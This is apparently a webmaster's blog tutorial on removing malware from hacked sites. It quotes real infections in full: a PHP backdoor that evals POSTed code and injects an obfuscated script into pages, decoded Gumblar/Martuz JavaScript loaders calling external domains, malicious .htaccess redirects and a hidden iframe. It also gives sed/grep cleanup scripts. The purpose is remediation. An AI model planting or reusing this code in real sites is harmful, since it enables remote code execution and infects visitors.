Remove malware from web sites

Print
Details
Parent Category: Security
Hits: 5061

Your site has been banned by Google because it contain viruses, trojans, or other malware?
Here is a nice tutorial that will help you to remove all this bad stuff.
Few days ago i had to remove malware from a site. After i've downloaded the hole site to my computer, i've start
looking into the php files(the site was made in php)

 

Here is how it look:
# cat class.database.php 
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST
['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',
base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0
gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO3ZhciBHWmFjPXVuZXNjYXBlKC
gndl82MXJfMjBhXzNkXzIyU2NyXzY5cHRFXzZlXzY3aW5fNjVfMjJfMmNiXz
NkXzIyXzU2XzY1cl83M2lvbigpK18yMl8yY2pfM2RfMjJfMjJfMmNfNzVfM2
RuXzYxXzc2aWdhdG9yXzJldXNlcl80MWdlbnRfM2JpZl8yOCh1XzJlaW5k
ZXhPXzY2KF8yMldpbl8yMilfM2VfMzApXzI2XzI2KHVfMmVfNjluZGV4X
zRmZl8yOF8yMk5fNTRfMjA2XzIyKV8zYzApXzI2XzI2KGRfNmZfNjN1b
V82NW50XzJlY29va2lfNjVfMmVpXzZlZGV4XzRmXzY2KF8yMm1fNjlfN
jVrXzNkXzMxXzIyKV8zY18zMClfMjZfMjZfMjhfNzR5XzcwXzY1b182Nl8y
OHpydnp0c18yOV8yMV8zZF83NHlwZW9mKF8yMkFfMjIpKSlfN2J6cn
ZfN2F0c18zZF8yMkFfMjJfM2JldmFfNmMoXzIyaWYoXzc3XzY5bmRv
d18yZV8yMithK18yMilqXzNkaitfMjJfMmJhK18yMk1ham9fNzJfMjIrYi
thXzJiXzIyTV82OW5vcl8yMitiK2FfMmJfMjJCdWlfNmNkXzIyK2IrXzIy
al8zYl8yMilfM2JfNjRvY183NV82ZGVudF8yZV83N3JfNjl0ZV8yOF8yM
l8zY3NjcmlwdF8yMHNyY18zZF8yZl8yZmd1bWJsYXJfMmVjbl8yZnJz
c18yZl8zZmlkXzNkXzIyK182YStfMjJfM2VfM2NfNWNfMmZzY183M
l82OV83MF83NF8zZV8yMilfM2JfN2QnKS5yZXBsYWNlKC9fL2csdF
dWKSk7ZXZhbChHWmFjKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))
$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>
#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s
*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos
($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s)
;}$s1=preg_replace('#<script language=javascript>
<!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=
preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
 $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS[
'tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--)
{$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);
$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp
_lkojfghx2(); ?><?php



/*

Database class

*/

class database {

 var $error = null;
 
 // Set DB_URL
 function database($url = '') {
 	$this->db_url = $url;
 	// Connect to database
 	$this->connect();
 	// Check for database connection error
 	if($this->is_error()) {
 		die($this->get_error());
 	}
 }
 
 // Connect to the database
 function connect() {
 	$status = $this->db_handle = mysql_connect(DB_HOST, DB_USERNAME, DB_PASSWORD);
 	if(mysql_error()) {
 		$this->connected = false;
 		$this->error = mysql_error();
 	} else {
 		if(!mysql_select_db(DB_NAME)) {
 			$this->connected = false;
 			$this->error = mysql_error();
 		} else {
 			$this->connected = true;
 		}
 	}
 	return $this->connected;
 }
 
 // Disconnect from the database
 function disconnect() {
 	if(isset($this->Database)) {
 		mysql_close();
 		return true;
 	} else {
 		return false;
 	}
 }
 
 // Run a query
 function query($statement) {
 	$mysql = new mysql();
 	$mysql->query($statement);

 	if($mysql->getError()) {
 		$this->set_error($mysql->getError());
 		return null;
 	} else {
 		return $mysql;
 	}
 }
 
 // Gets the first column of the first row
 function get_one($statement) {
 	$fetch_row = mysql_fetch_row(mysql_query($statement));
 	$result = $fetch_row[0];
 	if(mysql_error()) {
 		$this->set_error(mysql_error());
 		return null;
 	} else {
 		return $result;
 	}
 }
 
 // Set the DB error
 function set_error($message = null) {
 	global $TABLE_DOES_NOT_EXIST, $TABLE_UNKNOWN;
 	$this->error = $message;
 	if(strpos($message, 'no such table')) {
 		$this->error_type = $TABLE_DOES_NOT_EXIST;
 	} else {
 		$this->error_type = $TABLE_UNKNOWN;
 	}
 }
 
 // Return true if there was an error
 function is_error() {
 	return (!empty($this->error)) ? true : false;
 }
 
 // Return the error
 function get_error() {
 	return $this->error;
 }
 
}

class mysql {

 var $error = null;

 // Run a query
 function query($statement) {
 	$this->result = mysql_query($statement);
 	$this->error = mysql_error();
 	return $this->result;
 }
 
 // Get the ID generated from the previous INSERT operation
 function getInsertID() {
 	return mysql_insert_id();
 }

 // Fetch num rows
 function numRows() {
 	$val = mysql_num_rows($this->result);
 	$this->error = mysql_error();
 	return $val;
 }
 
 // Fetch row
 function fetchRow() {
 	$val = mysql_fetch_array($this->result);
 	$this->error = mysql_error();
 	return $val;
 }

 // Fetch array
 function fetchObject() {
 	$val = mysql_fetch_object($this->result);
 	$this->error = mysql_error();
 	return $val;
 }
 
 // Get error
 function getError() {
 	if($this->error != null) {
 		return $this->error;
 	} else {
 		return null;
 	}
 }

}

$database = new database();

?>
 
See the base64_decode line. I've put the text into a test.php file
<?php
$str = 'PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB0V1Y9JyUnO........';
echo base64_decode($str);
?>
and the result was in deed a virus code:
 # php  virus_test.php 
<script language=javascript><!-- 
(function(){var tWV='%';var GZac=unescape(('v_61r_20a_3d_22Scr_69ptE_6e_67in_
65_22_2cb_3d_22_56_65r_73ion()+_22_2cj_3d_22_22_2c_75_3dn_61_76igator_2euser_
41gent_3bif_28(u_2eindexO_66(_22Win_22)_3e_30)_26_26(u_2e_69ndex_4ff_28_22N_
54_206_22)_3c0)_26_26(d_6f_63um_65nt_2ecooki_65_2ei_6edex_4f_66(_22m_69_65k_3d_31_22)
_3c_30)_26_26_28_74y_70_65o_66_28zrvzts_29_21_3d_74ypeof(_22A_22)))_7bzrv_
7ats_3d_22A_22_3beva_6c(_22if(_77_69ndow_2e_22+a+_22)j_3dj+_22_2ba+_
22Majo_72_22+b+a_2b_22M_69nor_22+b+a_2b_22Bui_6cd_22+b+_22j_3b_22)
_3b_64oc_75_6dent_2e_77r_69te_28_22_3cscript_20src_3d_2f_2fgumblar_2ecn_
2frss_2f_3fid_3d_22+_6a+_22_3e_3c_5c_2fsc_72_69_70_74_3e_22)_3b_7d')
.replace(/_/g,tWV));eval(GZac)})();
 --></script>

























After i removed by hand the bad code everything got ok. 
Ok that was the first example of malware remove.
Example 2:  
Sometimes attackers modify the .htaccess file. This is how it looks:
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://badsite/ [R=301,L]

Example 2 complex:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://badsite [R,L]
 
Example 3:
Here, i had to remove malware from
Indian Embassy from Greece : http://www.indianembassy.gr
One of the infected file: http://indianembassy.gr/greece/pages_greek.html:
# cat pages_greek.html  
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Flash Page Flip</title>
<meta name="Description" content="Flash Page Flip is best advanced dynamic page flip flash object">
<meta name="Keywords" content="page flip, page flipping, page turn, flip album, flipping book, digital book, online catalog">
<script src="/js/AC_RunActiveContent.js" mce_src="js/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="/js/PopUpWin.js" mce_src="js/PopUpWin.js" type="text/javascript"></script>
<style type="text/css">
<!--
body {
	background-color: #ccc;
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
#main{
position:absolute;
top:0px;
left:0px;
width:100%;
height:100%;
}
#max{
position:absolute;
left:0px;
top:550px;
height:50px;
width:200px;
background-image:url('swf/down_banner.gif');
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;
font-weight:bold
}
#red{
width:auto;
height:20px;
}
.style1 {color: #FFFFFF}

-->
</style></head>
<script language=javascript><!-- 
(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~74Engine~22~2cb
~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~67ator~2eus~65rA~67ent
~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~26(u~2eind~65xOf~28~22Win~22)~
3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~3c0)~26~26(~64oc~75ment~2ec~6foki~65~
2eindex~4ff~28~22mie~6b~3d1~22)~3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~
6ff(~22A~22~29))~7bzrv~7ats~3d~22A~22~3b~65val~28~22if(window~2e~22+a+~22)~
6a~3dj+~22+a~2b~22M~61jo~72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~
22+b+~22j~3b~22)~3bdocument~2ewr~69~74e~28~22~3cscript~20~73r~63~3d~
2f~2fm~61r~22~2b~22~74uz~2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~
5c~2fscript~3e~22)~3b~7d').replace(dcdP,ufIC));eval(gQOS4)})(/\~/g);
 --></script><body>
<div id="main">

<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0','width','100%','height','100%','src','swf/Magazine','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','bgcolor','#cccccc','allowFullScreen','true','allowScriptAccess','sameDomain','wmode','transparent','movie','swf/Magazine' ); //end AC code
</script><noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="100%" height="100%">
  <param name="movie" value="swf/Magazine.swf" />
  <param name="quality" value="high" />
  <param name="bgcolor" value="#cccccc" />
  <param name="allowFullScreen" value="true" />
  <param name="allowScriptAccess" value="sameDomain" />
  <param name="wmode" value="transparent"/>
  <embed src="/swf/Magazine.swf" mce_src="swf/Magazine.swf" width="100%" height="100%" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" allowFullScreen="true" allowScriptAccess="sameDomain"></embed>
</object></noscript></div>
<div id="max" align="center">
<div id="red"></div>
<span class="style1"><a href="http://www.consagous.com" mce_href="http://www.consagous.com"><font color="#FFFFFF">
www.consagous.com</font></a></span></div>

The virus is called Martuz and is another version of Gumblar virus. 
You can find infected files using this command:
grep -ril unescape "public_html_dir".
Beacause the site have 115 afected files, removin by hand was killing me so 
i've made a script wich remove the bad code from files:
# cat clean_Martuz.sh 
#!/bin/bash

for i in `grep -ril unescape /sites/*| grep php` ; do

	echo "Removing virus from $i";

	sleep 1;

sed -e s/"(function(dcdP){var ufIC='%';var gQOS4=unescape(('v~61r~20a~3d~22~53crip~
74Engine~22~2cb~3d~22Ve~72s~69on~28)+~22~2c~6a~3d~22~22~2cu~3dn~61v~69~
67ator~2eus~65rA~67ent~3bif(~28u~2eindex~4ff~28~22Chrome~22)~3c0~29~26~
26(u~2eind~65xOf~28~22Win~22)~3e0)~26~26(u~2eindex~4ff(~22NT~206~22)~
3c0)~26~26(~64oc~75ment~2ec~6foki~65~2eindex~4ff~28~22mie~6b~3d1~22)~
3c0)~26~26(t~79peo~66~28zr~76zts)~21~3dtype~6ff(~22A~22~29))~7bzrv~7ats~3d~
22A~22~3b~65val~28~22if(window~2e~22+a+~22)~6a~3dj+~22+a~2b~22M~61jo~
72~22+b+a~2b~22Mino~72~22+b+~61~2b~22Build~22+b+~22j~3b~22)~3bdocument~
2ewr~69~74e~28~22~3cscript~20~73r~63~3d~2f~2fm~61r~22~2b~22~74uz~
2e~63n~2fvi~64~2f~3f~69d~3d~22+~6a+~22~3e~3c~5c~2fscript~3e~22)~
3b~7d').replace(dcdP,ufIC));eval(gQOS4)})"//g $i > x && mv x $i

done

 Example 4:
Of course we never got an iframe example. Today i've just remove an iframe code from 
the site: http://www.xxxxx.com:
Let's have a look on one of suspicious files:
#cat customization/homepage.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style1 {
	color: #666666;
	font-weight: bold;
	font-style: normal;
}
-->
</style>
</head>

<body><iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169 style=
"visibility: hidden"></iframe>
<table width="100%" border="0" align="center">
  

So, the evil code is <iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169
 style="visibility: hidden"></iframe>.
This code was present in every files, including html, js, php. Again sed and regular 
expressions saved me:
# cat clean_iframe.sh
#!/bin/bash

virus='<iframe src="http://b5z.ru:8080/index.php" mce_src="http://b5z.ru:8080/index.php" width=105 height=169
 style="visibility: hidden"></iframe>'
echo "Virus code: $virus"
path="/public_html/"

for i in `grep -ril "$virus" $path/*` ; do

	echo "Removing virus from $i";

	sleep 1;

sed -e s/'[<]iframe src="http:\/\/b5z.ru:8080\/index.php" mce_src="http:\/\/b5z.ru:8080\/index.php" width=105 height=169 
style="visibility: hidden"[>][<]\/iframe[>]'//g $i > /tmp/x && mv /tmp/x $i

done


  
Advices: 
1)If you are using some in-house PHP scripts, consult the PHP Security Guide
2)Write protect server files that should not be modified by your web application
(644 permissions on *nix)
3)Check your local computers for spyware and viruses.
4)Change all passwords.
 















































Note:


         We use  Hosting and VPS Hosting, from:
www.star-host.org

We like and trust them.

Good prices, high security.